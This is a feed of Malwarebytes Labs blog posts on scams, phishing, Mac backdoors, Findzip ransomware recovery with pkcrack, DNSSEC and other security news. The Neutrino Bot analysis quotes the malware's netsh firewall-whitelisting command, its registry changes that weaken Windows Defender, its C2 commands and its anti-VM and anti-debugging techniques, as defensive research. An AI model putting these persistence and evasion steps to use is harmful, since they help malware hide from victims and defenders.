Free antivirus coupon leads to tech support scam

Malwarebytes - Fri, 03/03/2017 - 16:00

In a previous blog post, we showed how users were redirected to a tech support scam page via a rogue Google Chrome extension. This time we take a look at another clever ruse to trick you into calling for assistance, and ultimately getting scammed.

This scheme is actually hosted on the same domain that was running the fake Windows support we described before and our assumption is that users are redirected to this coupon page via a similar malvertising campaign.

It plays on special offers, discounts and time-limited deals to entice you to claim your product now, choosing between Norton or McAfee. After filling in your personal details (which are actually sent off to the crooks), a page simulates the offer being processed only to fail with an error message. Victims are mislead into thinking that their offer was redeemed, but that they must perform a final call to get it completed.

Click to view slideshow.

This is where the tech support scam comes in. Once you call that number, you are routed to an Indian boiler room where one of many agents will take remote control of your computer to figure out what went wrong. (Un)shockingly, the bogus technician will identify severe problems that need an immediate fix.

Despite the scam being about Norton, the technician brushes it off as useless when it comes to the real deal: “Junk is a kind of virus which is the most harmful virus“. With his technical expertise, he proceeds to highly recommend the most expensive plan, for a lifetime low price of $400.

Of course, there is nothing there, it’s a pure rip-off where once they have your money, they couldn’t care less about helping you out (for a problem you didn’t have in the first place anyway).

The crooks are using as the placeholder to download remote software and host the payment platform:

Click to view slideshow.

There are other scam domains also hosted on this IP ( is familiar and related to a previous investigation where the owner of that tech support company incriminated himself by posting a comment on our blog which shared the same IP address as the remote technician who had just scammed us.

As always, please stay vigilant online when you see free coupons or other similar offers. They often are the gateway to a whole of trouble. For more information on tech support scams, please visit our page here.

The post Free antivirus coupon leads to tech support scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Coachella-gate: fire in the disco

Malwarebytes - Thu, 03/02/2017 - 19:09

I’d like to make some smart references to the Coachella event, except that I’ve only heard of about  six of the acts, one of them is named after a TV show and I mean, come on…”Swet Shop Boys”?

Instead, I’ll begin by pointing out that the last time I went to a music festival was in 2001, and there was a huge riot, a power generator exploded and set my tent on fire, and I was stranded on a hill at 2AM with half a dozen firemen holding axes. I am not the right person to ask, unless you want to know about sleeping in a ditch at 2AM with no tent due to it being a smoking pile of burnt ash.

I mentioned the exploded and very much on fire generator, right?

All well and good, but what we have here is a different kind of risk, in the form of a compromised database up for grabs on the Dark Web. The data swiped includes the following:

Usernames, first and last names, shipping addresses, email addresses, phone numbers and dates of birth.

You don’t even need to know Beyonce pulled out of the event to know this isn’t a good thing, as it opens the door to very personalized phishing attempts. Smooth criminals will no doubt fire off some fake refund/special festival deals at people who may not know about the breach, so it’s crucial we heal the world by ensuring word gets out about what happened.

If, after you’ve finished working 9 to 5, you become a calendar girl and spend a perfect day mapping out upcoming events for a nice Saturday in the park—and yes, this is the obligatory section jamming in as many song titles as possible, I won’t do it again—then you should keep one hand in your pocket, and the other pointing at dubious emails (Sorry. Sorry. Won’t do it again. And anyway, it wasn’t me).

The good news is, no payment information was compromised—but by the same token, cards can be canceled and replaced. It’s a bit trickier to replace the information swiped above, to varying degrees of difficulty and/or time-wasting inconvenience. Lots of techniques exist for spotting a fake mail and more often than not a few moments of fact checking works wonders.

If you’re off to Coachella this year, have a good time and remember to go directly to the source where all email missives are concerned. There may be dancing in the street in California, but the man who sold the world—and quite possibly your home address—is still in no immediate danger of having some Folsom city blues.


Chris “Martin” Boyd

The post Coachella-gate: fire in the disco appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Australians beware: myGov phishing on the prowl

Malwarebytes - Thu, 03/02/2017 - 16:00

In Australia, myGov is a “simple and secure way to access government services online”.

  • Secure access to a range of government services using one username and password
  • A single inbox for your messages from Centrelink, Medicare, Child Support and the Australian Taxation Office
  • A quick and easy way to advise selected member services about changes to some of your personal details

Unfortunately, phishing campaigns happily target such services given the plentiful data a successful scam can harvest with relative ease. Here’s a nasty one which was doing the rounds a week or so ago via email:

Australian government and myGov must verify your identity!

This is a notification email only. Please do not reply to this email as this mailbox is not monitored.

This is a message from the myGov team.

Australian government and myGov must verify your identity – (Part 4.2, paragraph 4.2.13 of the AML/CTF rules).

Click “Go to myGov” and start the verification process.

Thank you

The URL – which we’ve reported and has been taken offline – seems to have been a compromised website, located at


The landing page is a carbon copy of the real myGov login screen and asks for a myGov username and password.

For a more typical phish, that might be as far as the scammers go; here, the data grab is rather spectacular as we progress to the next page:

The text reads as follows:

Australian Government and myGov must verify your identity – (Part 4.2, paragraph 4.2.13 of the AML/CTF Rules).
To upload your identity documents please use the ‘Browse’ button.

Important Tips
Ensure that you upload a high quality copy of the front and back of your licence and that it is straight and not on an angle. We only accept valid Australian Drivers Licenses.
Ensure that you upload a high quality copy of your passport and that it is straight and not on an angle. We only accept valid Australian Passports.

Front of Australian Drivers License Unlinked
Back of Australian Drivers License Unlinked
Australian Passport Unlinked

Yes, that is the phishing page asking the victim to browse their PC and upload copies of their passport and front/back of their driver’s license. They’re not done yet, however, presenting them with a dropdown urging the victim to “Link their banking account”. This is where things become very interesting – note the design change. It still says “Australian Government – myGov” at the top, but we’re suddenly presented with narrow rectangles, almost like we’re looking at a totally different style of site:

There’s multiple banks listed, but only two are able to be selected – Citibank and Commonwealth Bank. Regardless of which one is picked, the scammers then ask for:

Client number and password

Mother’s maiden name
Phone number
Telephone banking passcode

Note the first reference to something called “Poli ID”. At this point, it simply appears to be “some bank stuff” related to the overall process and probably wouldn’t attract too much attention. It’ll become important later.

For now, the scammers stick with the theme of mobile banking:

A one time PIN has been sent via SMS to your registered mobile. Please enter the 6 digit OTP below and select continue.

The scammers send the bank info via: [form id=”stpForm” action=”safe2(dot)php” method=”post” name=”date”], and then we see what claims to be an attempted payment failure message, via some code in the page’s HTML:


Polipay is an Australian payment system which allows you to “use your internet banking to securely pay for goods and services”. If you’re a website owner, you can potentially become a merchant and integrate payment facilities into your site.

As it happens, both Citibank and Commonwealth Bank can be used with Poli – which are the only two banks the phish page lets you choose from. The scammer is – for reasons known only to them – popping a hardcoded “payment failed” message to the tune of $1,000 (Australian dollars?). The supposed attempted payment appears as though it’s being sent to a Bitcoin wallet via Coinspot(dot)com, listed in the code under the “merchant” tag.

Here is the failed payment attempt message that pops no matter what you do:

What the phishers have done here is start off with a myGov phish to set the scene, then divert the victim into a payment flow entirely unrelated to anything myGov, and modeled the “link your bank account to myGov” section on Polipay (check out the demo).

It’s not possible for the $1,000 payment to go out, as the stolen information is being collected and sent to scammers via a .php page, and not using Polipay. We notified Polipay on Twitter (Feb 14th) and by email on Feb 15th, and their reply is as follows:

It seems the culprit has screen grabbed screens from a transaction and manipulated them to gain the information they require. This series of screens was hosted on the culprits URL.

The screens grabbed where [sic] from an incomplete transaction with a POLi merchant.

User awareness on the internet is an important factor – specifically, knowing how to ensure the identity of a website owner. POLi employs Extended Validation SSL for its payment systems which makes it clear to users that they are making a payment through a POLi Payments service website. Sites claiming to be POLi which don’t bear this level of company validation are imposters/scammers/phishers etc.

It’s a bit of an odd thing to do with a live phish, as up until the end part of the scam the victim wouldn’t have any idea about the Polipay / Coinspot side of things. If you wanted to keep the victim unaware that something funny is going on, I couldn’t think of a worse way to do it than randomly telling them “HEY THIS PAYMENT HAS FAILED” because the natural reaction would be “…what payment?”

This is a pretty interesting con job, then, and regardless of what the scammers were up to they’d still have the victim’s other information such as the uploaded documentation.

Always be wary if asked for the kind of information requested up above, and if in doubt, contact the relevant official body directly, whether bank or Government portal. It’ll potentially save you time, effort, money, and a couple of forms of identification to boot.

Chris Boyd (Thanks to Steven and Nathan for additional information)

The post Australians beware: myGov phishing on the prowl appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Two new Mac backdoors discovered

Malwarebytes - Wed, 03/01/2017 - 15:00

On Valentine’s Day, Mac users got a special “treat” in the form of new malware. Then, later that same week, there were signs of yet another piece of malware looming. These threats were overshadowed a bit by the discovery last week of the second ransomware app to ever appear on the Mac, but they’re still worthy of consideration.

The first malware, named XAgent, was analyzed by Palo Alto Networks. XAgent, it turns out, is related to the Komplex malware discovered by Palo Alto last year, as can be seen by comparing some of the strings to those found in Komplex.

At that time, Palo Alto tied Komplex to the Sofacy Group – also known by the names Fancy Bear and APT28, among others – a Russian hacking organization that has since been linked to such things as the hack of the Democratic National Convention.

XAgent is a backdoor that provides a number of powerful remote access features, including keylogging, screenshots, remote shell access, and file exfiltration. Of particular interest is a command that provides the hacker with information about iOS backups stored on the infected Mac. iPhones (and other iOS devices) are notoriously difficult to hack, but by targeting backups instead, this malware could access potentially sensitive iPhone data.

Interestingly, Patrick Wardle, Director of Research at Synack, had another interesting revelation about this malware. He shows quite convincingly that the Sofacy Group used code copied from the Hacking Team. (Hacking Team is the creator of the Remote Control System backdoor, which it sells to governments and law enforcement, among other organizations.)

Hacking Team was itself the victim of a hack in 2015, and all their source code was made public. Wardle was able to demonstrate key similarities, such as identical bugs, in the decompiled XAgent code and the leaked Hacking Team code. It appears that Sofacy used Hacking Team code in their malware, most likely obtained from the Hacking Team breach.

According to a whitepaper released by Bitdefender, the malware installs itself into the following folder, where it is given one of a set of hard-coded names:


At the time of its discovery, the XAgent command & control servers were down, meaning that this variant of the malware is no longer a threat.

On the heels of the XAgent discovery came an intriguing glance at another piece of Mac malware, a sample of which has not yet been found. Three days after Palo Alto released their analysis of XAgent, Apple released an update to XProtect – the built-in anti-malware software in macOS – that added detection of XAgent.

However, that update also included a signature for something Apple called OSX.Proton.A, which ignited a storm of questions in the security community, who had never heard of any such malware for the Mac.

A little digging by Arnaud Abbati, a researcher at Ninja, Inc, turned up a page from the Sixgill website with a terse description of a remote access tool (RAT) called Proton. The page has been taken down, but can still be found in Google’s cache here.

Apparently, the malware is being sold on a Russian cybercrime forum, among other places. Sixgill also provided a link to a YouTube video from December, apparently made to promote the malware by demonstrating its capabilities. Another YouTube video, posted on February 8, showed additional capabilities.

Unfortunately, thus far, no samples of the malware have been found. It does not appear to be in the VirusTotal database, and neither of the sites that appear to be associated with Proton (ptn[dot]is or protonsolutions[dot]net) are responding. Even Sixgill’s analysis seemed to be done entirely from online sources, and had no information to suggest that they had seen a copy of the malware. For now, this is a completely unknown threat with rather frightening apparent capabilities.

Two new malware threats in a week, added to the others previously seen this year (Quimitchin/Fruitfly, MacDownloader, a new class of Microsoft Office macro malware and the Findzip ransomware), brings the Mac malware count for 2017 up to 6, and February isn’t even over yet. If things continue at this rate, 2017 could see a spike in Mac malware that could rival or exceed the previous high point in 2012, when the infamous Flashback, and a number of other pieces of malware taking advantage of Java vulnerabilities, terrorized the Mac community.

The post Two new Mac backdoors discovered appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Decrypting after a Findzip ransomware infection

Malwarebytes - Tue, 02/28/2017 - 16:00

The Findzip ransomware was discovered on February 22, 2017. At that time, it was thought that files would be irreversibly encrypted by this ransomware, with no chance of decryption. Turns out, that’s not quite true.

For those who get infected with Findzip (aka Filecoder), it’s still true that the hackers behind it can’t give you a key to decrypt it. There’s no honor among these particular thieves, as they’re lying about their ability to help if you pay the ransom.

However, all hope is not lost! If you made the mistake of not having a backup, or if your backup was also compromised by the ransomware, there’s still a chance for you to recover. It will not be fast or easy, but by following the instructions in this article, you’ll be able to regain your files. These instructions will be daunting for many, so if you have any doubts about your ability to follow them, please seek help from someone with more experience.

Special thanks to Jérôme Segura and @TheWack0lian for their help with this procedure. I wouldn’t have been able to build these instructions without their advice!

Gathering the materials

There are a few things you’re going to need before you get started.

  1. A working computer
  2. Xcode or TextWrangler
  3. Xcode command-line tools
  4. pkcrack source code
  5. One unencrypted file and the corresponding encrypted file

First, of course, you’ll need a working computer. This could be something like a second computer or could be another user account on the infected Mac. If you managed to force-quit the malware before it encrypted your whole user account, you may even be able to continue using your existing account.

These instructions assume that you’ll be doing the work on a Mac. If you need to do the decryption on a Windows or Linux computer, you’ll need to figure out how to compile and use pkcrack on that system.

Second, you’ll either need Apple’s Xcode development environment or a good text editor. Xcode is a rather large download that most people will never use in any way, so unless you have a reason to have Xcode, I recommend downloading TextWrangler. It’s an excellent text editor with many possible uses.

Next, you need to install the Xcode command-line tools, which fortunately does not require actually installing Xcode. If you don’t have a copy of Xcode already, open the Terminal app, which is found in the Utilities folder in the Applications folder.

In the Terminal, enter the following command:

xcode-select --install

When you do, you’ll see the following window:

Click the Install button to install the command-line tools, agree to the license, and then wait for the download and install process to complete.

Fourth, you’ll need to download the pkcrack source code. Some people, at this point, might be a little skittish about downloading something like this, for good reason, but I’ve tried it out myself and it works well.

Finally, you will need one of the files that got encrypted in both encrypted and unencrypted form. The file needs to be exactly the same as one that got encrypted. This could be a document that had been attached to an e-mail message that you had saved, but could still retrieve from the e-mail server, or a document that you had stored on a flash drive or other external storage. Make sure the document isn’t too large or two small. Something larger than 1000 bytes, but not thousands of times larger, would be ideal.

If you can’t find such a file, you may be able to use the malicious Findzip app against itself. If you ran the app from somewhere in your user folder – like your Downloads folder – then the app will have (amusingly) encrypted itself. In this case, you can simply download a fresh copy of the app.

Control-click the fresh app and choose Show Package Contents from the contextual menu that appears. Be careful not to open the app! In the window that opens, there will be a Contents folder. Inside that is a file named Info.plist, which will be perfect for our purposes. Grab a copy of that file.

Next, on the encrypted system, find the remnants of that app and do the same thing. In this case, the Info.plist file will have been replaced with an encrypted file named Info.plist.crypt.

The rest of these instructions will involve using these Info.plist and Info.plist.crypt files, but any other pair of matching encrypted and unencrypted files will do just fine.

Compiling pkcrack

In order to use pkcrack, which will allow you to execute what is called a “known plaintext attack” against the encrypted file, you will need to compile it from the source code. The pkcrack source code you downloaded earlier should decompress into this:

The files in the src directory are the ones you’ll be interested in.

Unfortunately, as is, this code won’t compile on macOS. Fortunately, there are some very simple changes you can make to these files to fix that. Time to break out either Xcode or TextWrangler and use that to edit several of these files.

First, open the file named Makefile. There will be a line near the top of the file reading:

CFLAGS=-O6 -Wall

Change the 6 to a 2, so that line looks like this:

CFLAGS=-O2 -Wall

Then save and close the file.

Next, you’ll need to open the exfunc.c file. Find the line near the top that reads:

#include <malloc.h>

Delete this line, and only this line, then save and close the file.

Now, repeat this procedure, removing exactly that same line from the following files:

extract.c main.c readhead.c zipdecrypt.c

Once you’re done, you’re ready to compile the code. Fortunately, this is quite easy. Open the Terminal app again and type the following, but do not press return:


You can’t see it, but there’s a space after “cd”, so be sure to put that space there.

Next, drag the src folder from the pkcrack-1.2.2 folder onto the Terminal window. That will insert the path to that folder into the command. Now switch back to the Terminal and press return. This changes the current working directory in the Terminal to the src folder.

Finally, enter the following command:


This will compile the code, echoing a lot of text into the Terminal window that you don’t really need to worry about. As an example, here’s what this looked like on my system, with much of the output omitted in the middle for brevity:

Hyperion:~ thomas$ cd /Users/thomas/Desktop/pkcrack-1.2.2/src Hyperion:src thomas$ make gcc -O2 -Wall -c -o crc.o crc.c crc.c:24:13: warning: unused variable 'RCSID' [-Wunused-variable] static char RCSID[]="$Id: crc.c,v 1.3 1997/09/18 18:07:24 lucifer Releas... ^ 1 warning generated. [...] int makekey.c:19:13: warning: unused variable 'RCSID' [-Wunused-variable] static char RCSID[]="$Id: makekey.c,v 1.1 1997/02/15 09:44:44 lucifer Re... ^ 3 warnings generated. gcc -o makekey -O2 -Wall makekey.o crc.o keystuff.o Hyperion:src thomas$

There’s no need to worry about the warnings. You’ll know the build was successful if you now see the following files in the src folder:

extract findkey makekey pkcrack zipdecrypt

These are Unix executable files, also called “binaries.” For ease of use, move these files into a separate folder. I put them into a “bin” folder as shown here:

Finding the keys

The next step will involve using that pair of encrypted and unencrypted files obtained earlier to find three keys. For this example, we’ll use the Info.plist.crypt and Info.plist files referred to previously. Move those files into the bin folder, alongside the pkcrack binaries. Then rename the original, unencrypted file to something else; in this example, we’ll use Info_orig.plist.

Next, back in the Terminal, use the “cd” command again to change to the bin directory. Then, enter the following command:

./extract -p Info.plist.crypt Info.plist

This will produce a file called Info.plist, but its contents are still encrypted. Rename this file to something else, such as Info_enc.plist. (Of course, replace these names with the correct names for the file you’re working with, if you’re not using this Info.plist file.)

If the filenames you’re working with have spaces in them, you’ll need to enclose them in quotes. For example:

./extract -p "Some Word file.docx.crypt" "Some Word file.docx"

Now you’re ready to start searching for the keys. Enter the following command:

./pkcrack -c Info_enc.plist -p Info_orig.plist

(Again, be sure to use quotes around any filenames that contain spaces.)

The pkcrack app will start working on the encrypted file. Depending on the file, it could take a while, but for the Info.plist file in this example, and on my high-end MacBook Pro, it took less than a minute.

You’ll know it’s done when it beeps twice, and the Terminal is displaying something like this:

Hyperion:bin thomas$ ./pkcrack -c Info_enc.plist -p Info_orig.plist Files read. Starting stage 1 on Sat Feb 25 08:05:04 2017 Generating 1st generation of possible key2_1544 values...done. Found 4194304 possible key2-values. Now we're trying to reduce these... Done. Left with 2941 possible Values. bestOffset is 24. Stage 1 completed. Starting stage 2 on Sat Feb 25 08:05:11 2017 Ta-daaaaa! key0=c054acf9, key1=d1656d7b, key2=3549626f Probabilistic test succeeded for 1525 bytes. Ta-daaaaa! key0=c054acf9, key1=d1656d7b, key2=3549626f Probabilistic test succeeded for 1525 bytes. Searching... 11.2%

At this point, pkcrack is trying to find the passcode for the encrypted file, but that will not succeed due to the length of the passcode used by the malware. You can force it to cancel and quit by pressing control-C.

Fortunately, you don’t need the passcode… the three keys it found can be used to decrypt all the other decrypted files. Make a note of those three keys, labeled key0, key1, and key2.

Decrypting the files

At this point, we can decrypt the Info.plist.crypt file, as well as any other files encrypted by the malware on that particular Mac. Enter the following command:

./zipdecrypt c054acf9 d1656d7b 3549626f Info.plist.crypt

Be sure to replace the keys in this command with the ones obtained from your encrypted file, in order.

The result of this command will be the creation of a new, unencrypted file. Double-clicking this file will unzip it. The zip file will contain a series of nested folders, starting with “Users” and going through the entire path that the file was original found in. Dig down into each subsequent folder until you reach the original, now unencrypted, file.

Of course, you already had the original file, in this case. However, you can now repeat this zipdecrypt command with any other encrypted files, using the same keys. Recovering a large number of files in this manner will be tedious, but on the positive site, you can use that time to contemplate how this could have been avoided by having a good set of backups!

The post Decrypting after a Findzip ransomware infection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Feb 20th – Feb 27th)

Malwarebytes - Mon, 02/27/2017 - 21:00

Last week in the world of security, we had rogue chrome extensions teaming up with tech support scams, tips on how to stay safe during tax season, advice on locking down your social media profiles, and what to do in the aftermath of a cyberattack. We also teamed up with Cybersecurity Factory, recapped our time at the recent RSA Conference, and took a look at a typo-laden fake FBI mail.

Elsewhere from last week:

The post A week in security (Feb 20th – Feb 27th) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Neutrino Bot comes in a protective loader

Malwarebytes - Mon, 02/27/2017 - 19:30

Co-authored by Hasherezade and Jérôme Segura.

In this blog post we will cover a recent version of the multi-purpose Neutrino Bot (AKA Kasidet) which ironically was distributed by an exploit kit of the same name. Earlier in January this year, we had described Neutrino Bot that came via spam so we won’t go over those details again, but instead will focus on an interesting loader.

Anti VM detection is complemented by multiple layers hiding the actual core which made extraction of the final payload a bit of challenge.

Distribution method

This sample was collected via a malvertising campaign in the US that leveraged the Neutrino exploit kit. The infection flow starts with a fingerprinting check for virtualization, network traffic capture and antivirus software. If any are found (i.e. not a genuine victim), the infection will not happen. This check is done via heavily obfuscated JavaScript code in the pre-landing pages, rather than within the Flash exploit itself, like it used to in the past.

Once the initial check has passed, the next step is to launch a specially crafted Flash file containing a bunch of exploits for Internet Explorer and the Flash Player (similar to what was described here). The final step is the download and execution of the RC4 encoded payload via wscript.exe to bypass proxies.

The overall infection flow is summarized in the diagram below (click to enlarge):

A script from Maciej Kotowicz was used to extract artifacts from the Flash file.

Analyzed samples Behavioral analysis

The sample was well protected against being deployed in a controlled environment. When it detects that it is being run in a VM/sandbox it just deletes itself:

If the environment passed the checks, it drops its copy into: %APPDATA%/Y1ViUVZZXQxx/<random_name>.exe  (during tests we observed the following names: abgrcnq.exe, uu.exe):

The folder and the sample are hidden.

Persistence is achieved via the Task Scheduler:

The malware adds and modifies several registry keys. It adds some basic settings, including the installation date:

It modifies some keys in order to remain hidden in the system. Hidden/SuperHidden features allows its dropped copy to remain unnoticed by the user. It disables viewing such files by modifying the following registry keys:

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

It also adds itself into the firewall’s whitelist with this command:

cmd.exe " /a /c netsh advfirewall firewall add rule name="Y1ViUVZZXQxx" dir=in action=allow program=[full_executable_path]

Similarly, path to the malware is added to Windows Defender’s exclusions:

It disables reporting incidents to Microsoft’s cloud service (SpyNet):

HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting

It modifies settings of terminal services, setting MaxDisconnectionTime and MaxIdleTime to 0. Modified keys:

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxDisconnectionTime HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxIdleTime

If the full installation process went successfully, it finally loads the malicious core, and we can see a traffic typical for the Neutrino Bot. You can see below the beacon “enter” and the response “success”, encoded in base64. The response is sent as a comment in the retrieved blank html page, in order to avoid being noticed:

In the next request the bot sends information about itself, and in response the CnC gives it commands to be executed. Requests and responses are also base64 encoded. Example after decoding:




1463020066516169#screenshot#1469100096882000#botkiller#1481642022438251#rate 15#

The first command was to take a screenshot, and indeed, soon after we can see the bot sending a screenshot in JPG format:

From the sent version number we can conclude, that the version of the bot is 5.2 (similarly to this campaign).


The first layer is a stub of a crypter, that overwrites the initial PE in memory by the image of the loader. Unpacking it is demonstrated in this video:

The second layer is a loader that prevents from running the core bot in a controlled environment (i.e. on VM or under a debugger). This element is probably new (we didn’t observe it so far in previous campaigns of Neturino Bot, i.e. the one described here). We found the loader very effective in its protective task. Most of the sandboxes and test VMs used during tests failed to provide any useful results.

The final payload had features typical for Neutrino Bot family.

The loader code shows that it is an integral part of the full Neutrino Bot package – not yet another layer added by an independent crypter. Both, the payload and the loader are written in C++, use similar functions and contain overlapping strings. It  will be demonstrated in details later in this article. They both also have very close compilation timestamps: payload: 2017-02-16 17:15:43, loader: 2017-02-16 17:15:52.

A patched version of the loader, with environment checks disabled can be viewed here.

Loader Obfuscation techniques

The code inside contains some level of obfuscation. A few strings are visible:

  • Directory name
  • Some functions
  • Registry keys related with Windows Security features that are going to be disabled
  • Strings used to add a new scheduled task.

However, that is not all. Most of the strings are decrypted at runtime. Here is an example of loading an encrypted string:

First, the obfuscated string is written to the dynamically loaded memory by a dedicated function. Then, it is decrypted using a simple, XOR-based algorithm:

def decode(data): maxlen = len(data) decoded = bytearray() for i in range(0, maxlen): dec = data[i] ^ 1 decoded.append(dec) return decoded

The same string after decryption:

Most of the API calls are also dynamically resolved. Example:

Tracing API calls helps to understand the programs’s functionality. For this reason, the authors of this malware file implemented some of the functions without using API calls at all. In the below example you can see the function GetLastError() implemented by reading a low-level structure: Thread Envioroment Block (TEB):


In order to prevent from being executed more than once, the loader creates a mutex with a name that is hardcoded in the binary: 1ViUVZZXQxx.

The primary task of the loader is to check the environment, in order to make sure that the execution is not being watched. But, in contrary to most of the malware, the check is not just done once. There is a dedicated thread deployed:

It runs checks in a never ending loop:

If at any time, the loader detects i.e. some blacklisted process being deployed, execution is terminated.

Examples of the checks performed:

1. Enumerates through the list of the running processes (using dynamically loaded functions CreateToolhelp32SnapshotProcess32FirstProcess32Next). Calculates checksum from each retrieved process name and compares it with the built-in blacklist:

The blacklisted checksums:

.gist table { margin-bottom: 0; }

Implementation of the function searching blacklisted processes – as we can see, every function is loaded dynamically with the help of a corresponding checksum:

2. Searches blacklisted modules within the current process (using dynamically loaded functions CreateToolhelp32SnapshotModule32FirstModule32Next). Similarly, it calculates the checksum from each retrieved process name and compares it with the built-in blacklist.

Checksum calculation algorithm (implementation):

The blacklisted checksums:

.gist table { margin-bottom: 0; }

3, Checking if the process is under the debugger, using: IsDebuggerPresent, CheckRemoteDebuggerPresent

4. Detecting single-stepping with the help of time measurement, using GetTickCount – Sleep – GetTickCount

5. Anti-VM check with the help of detecting blacklisted devices – using QueryDosDevices i.e. VBoxGuest

6. Searching and hiding blacklisted windows by their classes – using  EnumWindowsGetClassName (i.e. procexpl)

The blacklisted checksums:

.gist table { margin-bottom: 0; }

In another thread, the malware performs operations related to the bot installation – adding a task to the Windows Scheduler, adding exclusions to the Firewall etc.

Finally, it unpacks the final payload and runs it with the help of the Run PE method. First, it creates another instance of its own:

Then, it maps a new PE file on this place:


The loaded payload is a Neutrino Bot, with very similar features to the one that we described in a previous post. However, we can find some similar elements like in the loader, for example matching strings:


Neutrino Bot has been on the market for a few years. It is rich in features but its internal structure was never impressive. This time also, the malware authors did not make any significant improvements to the main bot’s structure. However, they added one more protection layer which is very scrupulous in its task of fingerprinting the environment and not allowing the bot to be discovered.

The post New Neutrino Bot comes in a protective loader appeared first on Malwarebytes Labs.

Categories: Techie Feeds

DNSSEC: why do we need it?

Malwarebytes - Mon, 02/27/2017 - 18:00

DNSSEC is short for Domain Name System Security Extensions. It is a set of extensions that add extra security to the DNS protocol. This is done by enabling the validation of DNS requests, which is specifically effective against DNS spoofing attacks. DNSSEC provides the DNS records with a digital signature, so the resolver can check if the content is authentic.

The reason for this post was the recent SIDN report that concluded that the DNSSEC security status in the Netherlands left a lot to be desired. To name a few, the banking sector and the ISPs were lagging behind. Especially compared to the government sector, which has to be fully compliant by the end of 2017 and is now at a level of 59% of all domain names to be cryptographically secured and signed.

Background of the report

Included in the investigation were only .nl domains, so companies of a more international nature, that might be using other Top Level Domains (TLDs) were not included in the research. Let’s hope that companies of this nature are more advanced in this regard. On a grand total of approximately 5.7 million domains 46% were signed.

Additional security

Not only is DNSSEC a  security feature by itself, it also provides a platform for additional features like:

  • DKIM (DomainKeys Identified Mail)
  • SPF (Sender Policy Framework)
  • DMARC (Domain-based Message Authentication, Reporting and Conformance)
  • DANE (DNS-based Authentication of Named Entities)

Especially DANE, which is a protocol that allows Transport Layer Security (TLS) certificates to be bound to Domain Name System (DNS) names, is considered a major step forward in security after some certificate authorities (CA) providers have been breached and any CA could issue a certificate for any domain name. This is why we say that the green padlock is required, but not enough. Going forward it’s important to know that all the popular browsers support DNSSEC and most of them support DANE (for some browsers you may need a plug-in), so implementation of this extra security should put a major dent in the possibilities for DNS spoofing.

Extended DNSSEC Validator

Major conclusions of the report

Personally I was surprised, almost shocked, to find out that only 6% of the banking sites had their domains signed, the worst of all the investigated groups of domains. Especially worrying as the move from physical to on-line banking has been progressing steadily in recent times. The percentage for all financial corporations was at 16%. Other sectors where we would expect better figures:

  • ISPs (Internet Service Providers) 22%
  • Stock exchange listed companies 12%
  • Internet shops 30%
  • Telecom providers 33% and worst of all, of the 4 biggest providers with an .nl domain, none contributed to that score.

As stated before, the only group scoring somewhat satisfactory where government sites at 59%, with the remark that they are being forced to comply by the end of this year (2017).

So, even though the number of signed domain names has grown considerably over the past two and a half years (the previous report on this subject), some sectors are heavily lagging behind, and in particular some sectors where we would hope and expect otherwise.

Your country

If you have any similar figures about these numbers in your country, let me know in the comments. I would like to make some comparisons.


Pieter Arntz

The post DNSSEC: why do we need it? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake FBI mail: “Send us $112 or we’ll lock your iCloud account”

Malwarebytes - Fri, 02/24/2017 - 20:12

Here’s a scam mail which claims your iCloud has been accessed without permission, and will be locked within 2 hours if you don’t verify the account by sending $112 to a Bitcoin address.

The missive claims to be from and is titled, “Virus Warning: E-Mail from ‘FBI Alert”.

As you might expect, it’s rather all over the place, lurching from random mentions of virus warnings and fraudulent access, to a cavalcade of typo-ridden howlers:

Virus Warning: E-mail from ‘FBI Alert’

Apple has detected an unauthorized sign-in to your iClodu [sic] account.

Please verify your account by sending 112$ to this Bitcoin address:

If no response is received your account will be locked for security.

The server will lock yor [sic] account within 2 hours if we don’t receive the payment!

We are working to create a world where privacy is the norm, end-to-end encryption is the standard, and security and usability are synonymous.

FBI and iCloud is selling a tool for iCloud protection against hackers and scammers this tool costs only 112$

the license for our tool is 360 days

if you are not familiar with bitcoin you can buy it from here:


After we confirm the payment, we send the private key so you can unlock your email and download our tool

FBI SECURIRY [sic] iCloud and Apple Protection

Well, if you want to secure your iCloud I guess the right people for the job are definitely FBI Security…maybe?

The email definitely goes right off the rails at the end with random mentions of a “tool” designed to protect your iCloud from hackers, which also just happens to cost the same amount as the supposed verification fee. This is most definitely the “throw it all at a wall, see what sticks” approach but I’m not convinced it’ll be as successful as the scammers would like it to be. Should you receive any missives from the “FBI” regarding the safety of your iCloud account, feel free to send it to the trash. Elsewhere, you can visit the Apple website and find out everything you need to know about locking down your iCloud.


Christopher Boyd (Thanks Steven)

The post Fake FBI mail: “Send us $112 or we’ll lock your iCloud account” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Who else crushed it at RSA?

Malwarebytes - Fri, 02/24/2017 - 18:00

The theme for this year’s RSA Conference was the “Power of OpportUNITY”, and with more than 43,000 IT and security professionals in attendance—it truly was the gathering to bring our community together.

Malwarebytes was proud to once again take part in this spectacular week-long event. Thousands of customers, new businesses, students, press, and industry analysts made their way to our new booth to catch our giant threat theater presentation, see a demo, grab a new collectible T-shirt, and say “Hi” to our robot (who was officially named ZERO).

While at the booth, visitors shared with us the security challenges and pain they’re experiencing. Overwhelmingly, threats including zero-day exploits, malware, and ransomware are continuing to get through their existing defenses and perimeters. Businesses from around the country across every industry are all looking for better threat detection capabilities and ways to reduce their response times for incidents. This made for a great opportunity to explain how Malwarebytes technologies can address these shared needs.

Click to view slideshow.

But the week wasn’t just about security… the galleries at the recently remodeled San Francisco Museum of Modern Art were the perfect backdrop for our CRUSH PARTY on Valentine’s Day. Filled to capacity, guests fell in love with the perfect palette of music, food, and great art.

Click to view slideshow.

Mark your calendars now for RSA’s 27th annual conference, being held April 16-20, 2018 in San Francisco. ZERO and the rest of us Malwarenauts will be there, and we hope you’ll join us too!

Can’t wait till then? Check out our Events page to see where else we’re popping up this year.

